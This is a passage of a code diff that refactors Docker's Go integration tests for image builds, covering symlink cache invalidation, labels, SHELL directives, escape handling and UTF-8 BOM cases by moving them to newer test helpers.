id2 := getIDByName(c, "tag2:v2") c.Assert(id1, check.Equals, id2) } // #17290 func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY . ./`, - map[string]string{ + COPY . ./`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) // warm up cache - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) // add new file to context, should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644) c.Assert(err, checker.IsNil) - _, out, err := buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - - c.Assert(out, checker.Not(checker.Contains), "Using cache") - + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + if strings.Contains(result.Combined(), "Using cache") { + c.Fatal("2nd build used cache on ADD, it shouldn't") + } } func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink target`, - map[string]string{ + COPY asymlink target`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, 
build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined() c.Assert(out, checker.Matches, "bar") // change target file should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) c.Assert(err, checker.IsNil) - id, out, err = buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Not(checker.Contains), "Using cache") + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") - out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target") + out = cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined() c.Assert(out, checker.Matches, "baz") } func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink /`, - map[string]string{ + COPY asymlink /`), + fakecontext.WithFiles(map[string]string{ "foo/abc": "bar", "foo/def": "baz", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined() c.Assert(out, checker.Matches, "barbaz") // change target file should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644) c.Assert(err, checker.IsNil) - id, out, err = buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - c.Assert(out, 
checker.Not(checker.Contains), "Using cache") + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") - out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + out = cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined() c.Assert(out, checker.Matches, "barbax") } @@ -6355,103 +4851,88 @@ func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) { // not from the target file. func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink /`, - map[string]string{ + COPY asymlink /`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "asymlink").Combined() c.Assert(out, checker.Matches, "bar") - } // #17827 func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) { name := "testbuildrootsource" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY / /data`, - map[string]string{ + COPY / /data`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() // warm up cache - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) // change file, should invalidate cache - err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), 
[]byte("baz"), 0644) + err := ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) c.Assert(err, checker.IsNil) - _, out, err := buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - c.Assert(out, checker.Not(checker.Contains), "Using cache") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") } // #19375 +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) { - cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git") - cmd.Env = append(cmd.Env, "PATH=") - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="), + build.WithContextPath("github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "unable to prepare context: unable to find 'git': ", + }) - cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git") - cmd.Env = append(cmd.Env, "PATH=") - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="), + build.WithContextPath("https://github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "unable to prepare context: unable to find 'git': ", + }) } // TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir func (s *DockerSuite) TestBuildWorkdirWindowsPath(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildworkdirwindowspath" - - _, err := buildImage(name, ` - FROM `+WindowsBaseImage+` + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM 
`+testEnv.PlatformDefaults.BaseImage+` RUN mkdir C:\\work WORKDIR C:\\work RUN if "%CD%" NEQ "C:\work" exit -1 - `, true) - - if err != nil { - c.Fatal(err) - } + `)) } func (s *DockerSuite) TestBuildLabel(c *check.C) { name := "testbuildlabel" testLabel := "foo" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel), + build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo -`, false, "--label", testLabel) - - c.Assert(err, checker.IsNil) - - res := inspectFieldJSON(c, name, "Config.Labels") +`)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) if _, ok := labels[testLabel]; !ok { c.Fatal("label not found in image") } @@ -6459,19 +4940,11 @@ func (s *DockerSuite) TestBuildLabel(c *check.C) { func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) { name := "testbuildlabel" + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=bar"), + build.WithDockerfile("FROM busybox")) - _, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar") - - c.Assert(err, checker.IsNil) - - res, err := inspectImage(name, "json .Config.Labels") - c.Assert(err, checker.IsNil) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) v, ok := labels["foo"] if !ok { c.Fatal("label `foo` not found in image") @@ -6483,28 +4956,18 @@ func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) { name := "testbuildlabelcachecommit" testLabel := "foo" - if _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo - `, false); err != nil { - c.Fatal(err) - } - - _, err := buildImage(name, ` + `)) + buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel), + build.WithDockerfile(` FROM 
`+minimalBaseImage()+` LABEL default foo -`, true, "--label", testLabel) - - c.Assert(err, checker.IsNil) - - res := inspectFieldJSON(c, name, "Config.Labels") + `)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) if _, ok := labels[testLabel]; !ok { c.Fatal("label not found in image") } @@ -6516,30 +4979,19 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { "foo": "bar", "123": "456", } - - labelArgs := []string{} - + var labelArgs []string for k, v := range testLabels { labelArgs = append(labelArgs, "--label", k+"="+v) } - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags(labelArgs...), + build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo -`, false, labelArgs...) - - if err != nil { - c.Fatal("error building image with labels", err) - } - - res := inspectFieldJSON(c, name, "Config.Labels") +`)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) for k, v := range testLabels { if x, ok := labels[k]; !ok || x != v { c.Fatalf("label %s=%s not found in image", k, v) @@ -6547,59 +4999,22 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { } } -func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) { - name := "testbuildlabeloverwrite" - testLabel := "foo" - testValue := "bar" - - _, err := buildImage(name, ` - FROM `+minimalBaseImage()+` - LABEL `+testLabel+`+ foo -`, false, []string{"--label", testLabel + "=" + testValue}...) 
- - if err != nil { - c.Fatal("error building image with labels", err) - } - - res := inspectFieldJSON(c, name, "Config.Labels") - - var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - - v, ok := labels[testLabel] - if !ok { - c.Fatal("label not found in image") - } - - if v != testValue { - c.Fatal("label not overwritten") - } -} - func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) { - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) - + dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) baseImage := privateRegistryURL + "/baseimage" - _, err := buildImage(baseImage, ` + buildImageSuccessfully(c, baseImage, build.WithDockerfile(` FROM busybox ENV env1 val1 - `, true) - - c.Assert(err, checker.IsNil) + `)) dockerCmd(c, "push", baseImage) dockerCmd(c, "rmi", baseImage) - _, err = buildImage(baseImage, fmt.Sprintf(` + buildImageSuccessfully(c, baseImage, build.WithDockerfile(fmt.Sprintf(` FROM %s ENV env2 val2 - `, baseImage), true) - - c.Assert(err, checker.IsNil) + `, baseImage))) } func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) { @@ -6625,7 +5040,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -6637,11 +5052,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) // make sure the image is pulled when building dockerCmd(c, "rmi", repoName) - buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-") - 
buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName)) - - out, _, err := runCommandWithOutput(buildCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "--config", tmp, "build", "-"}, + Stdin: strings.NewReader(fmt.Sprintf("FROM %s", repoName)), + }).Assert(c, icmd.Success) } // Test cases in #22036 @@ -6649,12 +5063,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels will always override name := "scratchy" expected := `{"bar":"from-flag","foo":"from-flag"}` - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo=from-dockerfile`, - true, "--label", "foo=from-flag", "--label", "bar=from-flag") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`)) res := inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6662,12 +5073,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { name = "from" expected = `{"foo":"from-dockerfile"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo from-dockerfile`, - true) - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo from-dockerfile`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6676,12 +5083,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option label will override even via `FROM` name = "new" expected = `{"bar":"from-dockerfile2","foo":"new"}` - _, err = buildImage(name, - `FROM from - LABEL bar from-dockerfile2`, - true, "--label", "foo=new") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=new"), + 
build.WithDockerfile(`FROM from + LABEL bar from-dockerfile2`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6691,12 +5095,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // will be treated as --label foo="", --label bar="" name = "scratchy2" expected = `{"bar":"","foo":""}` - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo=from-dockerfile`, - true, "--label", "foo", "--label", "bar=") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo", "--label", "bar="), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6707,12 +5108,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // This time is for inherited images name = "new2" expected = `{"bar":"","foo":""}` - _, err = buildImage(name, - `FROM from - LABEL bar from-dockerfile2`, - true, "--label", "foo=", "--label", "bar") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=", "--label", "bar"), + build.WithDockerfile(`FROM from + LABEL bar from-dockerfile2`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6721,11 +5119,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels with only `FROM` name = "scratchy" expected = `{"bar":"from-flag","foo":"from-flag"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage(), - true, "--label", "foo=from-flag", "--label", "bar=from-flag") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"), + build.WithDockerfile(`FROM `+minimalBaseImage())) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { 
c.Fatalf("Labels %s, expected %s", res, expected) @@ -6734,31 +5129,22 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels with env var name = "scratchz" expected = `{"bar":"$PATH"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage(), - true, "--label", "bar=$PATH") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "bar=$PATH"), + build.WithDockerfile(`FROM `+minimalBaseImage())) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) } - } // Test case for #22855 func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) { name := "test-delete-committed-file" - - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo test > file RUN test -e file RUN rm file - RUN sh -c "! test -e file"`, false) - if err != nil { - c.Fatal(err) - } + RUN sh -c "! test -e file"`)) } // #20083 @@ -6775,13 +5161,14 @@ func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) { RUN sh -c "(ls -la /tmp/#1)" RUN sh -c "(! ls -la /tmp/#2)" RUN sh -c "(! ls /tmp/foo) && (! 
ls /tmp/foo2) && (ls /tmp/dir1/foo)"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "foo", - "foo2": "foo2", - "dir1/foo": "foo in dir1", - "#1": "# file 1", - "#2": "# file 2", - ".dockerignore": `# Visual C++ cache files + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("foo", "foo"), + build.WithFile("foo2", "foo2"), + build.WithFile("dir1/foo", "foo in dir1"), + build.WithFile("#1", "# file 1"), + build.WithFile("#2", "# file 2"), + build.WithFile(".dockerignore", `# Visual C++ cache files # because we have git ;-) # The above comment is from #20083 foo @@ -6791,15 +5178,7 @@ foo2 #1 # The following is not considered as comment as # is not at the beginning #2 -`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +`))) } // Test case for #23221 @@ -6807,13 +5186,9 @@ func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) { name := "test-with-utf8-bom" dockerfile := []byte(`FROM busybox`) bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...) - ctx, err := fakeContextFromNewTempDir() - c.Assert(err, check.IsNil) - defer ctx.Close() - err = ctx.addFile("Dockerfile", bomDockerfile) - c.Assert(err, check.IsNil) - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", string(bomDockerfile)), + )) } // Test case for UTF-8 BOM in .dockerignore, related to #23221 @@ -6827,31 +5202,19 @@ func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) { RUN ls /tmp/.dockerignore` dockerignore := []byte("./Dockerfile\n") bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...) 
- ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - err = ctx.addFile(".dockerignore", bomDockerignore) - c.Assert(err, check.IsNil) - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", string(bomDockerignore)), + )) } // #22489 Shell test to confirm config gets updated correctly func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { name := "testbuildshellupdatesconfig" + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + SHELL ["foo", "-bar"]`)) expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]` - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - SHELL ["foo", "-bar"]`, - true) - if err != nil { - c.Fatal(err) - } res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") if res != expected { c.Fatalf("%s, expected %s", res, expected) @@ -6866,32 +5229,28 @@ func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { name := "testbuildshellmultiple" - _, out, _, err := buildImageWithStdoutStderr(name, - `FROM busybox + result := buildImage(name, build.WithDockerfile(`FROM busybox RUN echo defaultshell SHELL ["echo"] RUN echoshell SHELL ["ls"] RUN -l - CMD -l`, - true) - if err != nil { - c.Fatal(err) - } + CMD -l`)) + result.Assert(c, icmd.Success) // Must contain 'defaultshell' twice - if len(strings.Split(out, "defaultshell")) != 3 { - c.Fatalf("defaultshell should have appeared twice in %s", out) + if len(strings.Split(result.Combined(), "defaultshell")) != 3 { + c.Fatalf("defaultshell should have appeared twice in %s", result.Combined()) } // Must contain 'echoshell' twice - if len(strings.Split(out, "echoshell")) != 3 { - c.Fatalf("echoshell should have appeared twice in %s", out) + if 
len(strings.Split(result.Combined(), "echoshell")) != 3 { + c.Fatalf("echoshell should have appeared twice in %s", result.Combined()) } // Must contain "total " (part of ls -l) - if !strings.Contains(out, "total ") { - c.Fatalf("%s should have contained 'total '", out) + if !strings.Contains(result.Combined(), "total ") { + c.Fatalf("%s should have contained 'total '", result.Combined()) } // A container started from the image uses the shell-form CMD. @@ -6906,15 +5265,9 @@ func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { name := "testbuildshellentrypoint" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox SHELL ["ls"] - ENTRYPOINT -l`, - true) - if err != nil { - c.Fatal(err) - } - + ENTRYPOINT -l`)) // A container started from the image uses the shell-form ENTRYPOINT. // Shell is ls. ENTRYPOINT is -l. So should contain 'total '. outrun, _ := dockerCmd(c, "run", "--rm", name) @@ -6926,43 +5279,26 @@ func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { // #22489 Shell test to confirm shell is inherited in a subsequent build func (s *DockerSuite) TestBuildShellInherited(c *check.C) { name1 := "testbuildshellinherited1" - _, err := buildImage(name1, - `FROM busybox - SHELL ["ls"]`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name1, build.WithDockerfile(`FROM busybox + SHELL ["ls"]`)) name2 := "testbuildshellinherited2" - _, out, _, err := buildImageWithStdoutStderr(name2, - `FROM `+name1+` - RUN -l`, - true) - if err != nil { - c.Fatal(err) - } - - // ls -l has "total " followed by some number in it, ls without -l does not. - if !strings.Contains(out, "total ") { - c.Fatalf("Should have seen total in 'ls -l'.\n%s", out) - } + buildImage(name2, build.WithDockerfile(`FROM `+name1+` + RUN -l`)).Assert(c, icmd.Expected{ + // ls -l has "total " followed by some number in it, ls without -l does not. 
+ Out: "total ", + }) } // #22489 Shell test to confirm non-JSON doesn't work func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { name := "testbuildshellnotjson" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` sHeLl exec -form`, // Casing explicit to ensure error is upper-cased. - true) - if err == nil { - c.Fatal("Image build should have failed") - } - if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") { - c.Fatal("Error didn't indicate that arguments must be in JSON form") - } + )).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "SHELL requires the arguments to be in JSON form", + }) } // #22489 Windows shell test to confirm native is powershell if executing a PS command @@ -6970,17 +5306,11 @@ func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildshellpowershell" - _, out, err := buildImageWithOut(name, - `FROM `+minimalBaseImage()+` + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` SHELL ["powershell", "-command"] - RUN Write-Host John`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "\nJohn\n") { - c.Fatalf("Line with 'John' not found in output %q", out) - } + RUN Write-Host John`)).Assert(c, icmd.Expected{ + Out: "\nJohn\n", + }) } // Verify that escape is being correctly applied to words when escape directive is not \. 
@@ -6988,48 +5318,32 @@ func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildescapenotbackslashwordtesta" - _, out, err := buildImageWithOut(name, - `# escape= `+"`"+` + buildImage(name, build.WithDockerfile(`# escape= `+"`"+` FROM `+minimalBaseImage()+` WORKDIR c:\windows - RUN dir /w`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(strings.ToLower(out), "[system32]") { - c.Fatalf("Line with '[windows]' not found in output %q", out) - } + RUN dir /w`)).Assert(c, icmd.Expected{ + Out: "[System32]", + }) name = "testbuildescapenotbackslashwordtestb" - _, out, err = buildImageWithOut(name, - `# escape= `+"`"+` + buildImage(name, build.WithDockerfile(`# escape= `+"`"+` FROM `+minimalBaseImage()+` SHELL ["powershell.exe"] WORKDIR c:\foo ADD Dockerfile c:\foo\ - RUN dir Dockerfile`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(strings.ToLower(out), "-a----") { - c.Fatalf("Line with '-a----' not found in output %q", out) - } - + RUN dir Dockerfile`)).Assert(c, icmd.Expected{ + Out: "-a----", + }) } // #22868. Make sure shell-form CMD is marked as escaped in the config of the image func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildcmdshellescaped" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` CMD "ipconfig" - `, true) - if err != nil { - c.Fatal(err) - } + `)) res := inspectFieldJSON(c, name, "Config.ArgsEscaped") if res != "true" { c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res) @@ -7046,13 +5360,12 @@ func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { // Test case for #24912. 
func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) { name := "testbuildstepswithprogress" - totalRun := 5 - _, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) + result := buildImage(name, build.WithDockerfile("FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun))) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) for i := 2; i <= 1+totalRun; i++ { - c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) + c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) } } @@ -7060,18 +5373,40 @@ func (s *DockerSuite) TestBuildWithFailure(c *check.C) { name := "testbuildwithfailure" // First test case can only detect `nobody` in runtime so all steps will show up - buildCmd := "FROM busybox\nRUN nobody" - _, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody") + dockerfile := "FROM busybox\nRUN nobody" + result := buildImage(name, build.WithDockerfile(dockerfile)) + c.Assert(result.Error, checker.NotNil) + c.Assert(result.Stdout(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Stdout(), checker.Contains, "Step 2/2 : RUN nobody") // Second test case `FFOM` should have been detected before build runs so no steps - buildCmd = "FFOM nobody\nRUN nobody" - _, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Not(checker.Contains), "Step 1/2 : FROM busybox") - c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN 
